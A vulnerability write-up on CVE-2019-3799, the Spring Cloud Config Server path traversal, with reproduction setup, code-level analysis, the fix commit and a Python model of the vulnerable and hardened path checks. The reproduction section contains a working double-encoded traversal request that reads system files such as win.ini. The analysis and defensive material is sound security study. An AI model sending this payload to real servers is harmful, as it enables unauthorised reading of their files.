[Java] CVE-2019-3799 Spring-Cloud-Config-Server path traversal / arbitrary file reading


Reproduction

Create a Spring project in IDEA, then add the following dependency to pom.xml:

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-config-server</artifactId>
    <version>2.0.2.RELEASE</version>
</dependency>

Configure application.properties:

server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git

Then request http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini

Analysis

Spring Cloud Config Server is the Spring component for distributed configuration management: configuration is stored on the server side, and clients fetch configuration values over HTTP. The route matched by the payload is org.springframework.cloud.config.server.resource.ResourceController#retrieve(), whose code is:

    // The trailing "**" captures everything after the label, including the payload
    @RequestMapping({"/{name}/{profile}/{label}/**"})
    public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
        // Extracts the "**" part of the request path without any traversal check
        String path = this.getFilePath(request, name, profile, label);
        return this.retrieve(name, profile, label, path, resolvePlaceholders);
    }

{name}/{profile}/{label}: name is the repository name, profile is the configuration profile, and label is the git branch name (usually master). In practice the name and profile values do not matter, but the label must be an existing branch. Stepping into getFilePath in the debugger shows that %25 has already been URL-decoded to %, so the path now contains ..%2F sequences. Continuing into retrieve(), the path passed in is our payload.

Continue following into findOne, located at org.springframework.cloud.config.server.resource.GenericResourceRepository#findOne.

The locations directory file:/C:/Users/icu/AppData/Local/Temp/config-repo-6608031716294156148/ is the temporary directory into which the git repository named in the configuration file was cloned. The ../ segments from the payload are concatenated onto it, resulting in a cross-directory file read.

Fix

https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2


The fix checks whether the path contains %, URL-decodes it if so, and then rejects paths containing special sequences such as ../, .., and /.
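As an added example (not the project's code), the following Python models both the traversal described in the analysis and the fix just described: the vulnerable resolver shows how the once-decoded ..%2F path turns into ../ when the file: URL is resolved, and the hardened check decodes while % remains and rejects any form containing .. segments. The clone directory and payload are constructed stand-ins, and the validation logic is my own rendering of the fix, not the commit's exact code.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-in for the write-up's Windows temp clone directory.
CLONE_DIR = "/tmp/config-repo-constructed"
# The "**" part of the write-up's request as ResourceController receives it,
# after the first URL-decode pass has already turned %252F into %2F.
PAYLOAD = "..%2F..%2F..%2F..%2F..%2F..%2Fwindows/win.ini"


def vulnerable_resolve(location, path):
    """Pre-fix behaviour: location + "/" + path is handed to the resource loader as a
    file: URL, whose decoding turns %2F into "/" so the ".." segments take effect."""
    return posixpath.normpath(unquote(location.rstrip("/") + "/" + path))


def is_invalid_path(path):
    """Reject a fully decoded path that is absolute, drive-qualified, or climbs with '..'."""
    normalized = path.replace("\\", "/")
    if normalized.startswith("/") or ":/" in normalized:
        return True
    return any(segment == ".." for segment in normalized.split("/"))


def is_invalid_encoded_path(path, max_rounds=3):
    """Mirror the fix described above: if '%' is present, decode and re-check.
    Decoding is repeated (bounded) so a triple-encoded path cannot slip through."""
    current = path
    for _ in range(max_rounds):
        if "%" not in current:
            return False
        decoded = unquote(current)
        if is_invalid_path(decoded):
            return True
        if decoded == current:  # a bare '%' that decodes to nothing new
            return False
        current = decoded
    return True  # still encoded after the bounded rounds: refuse rather than guess


def hardened_resolve(location, path):
    """Post-fix behaviour: validate raw and decoded forms before joining under the clone dir."""
    if is_invalid_path(path) or is_invalid_encoded_path(path):
        raise ValueError("rejected path: " + path)
    return posixpath.normpath(location.rstrip("/") + "/" + path)


if __name__ == "__main__":
    print(vulnerable_resolve(CLONE_DIR, PAYLOAD))            # escapes CLONE_DIR
    print(hardened_resolve(CLONE_DIR, "application.yml"))   # stays inside
```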
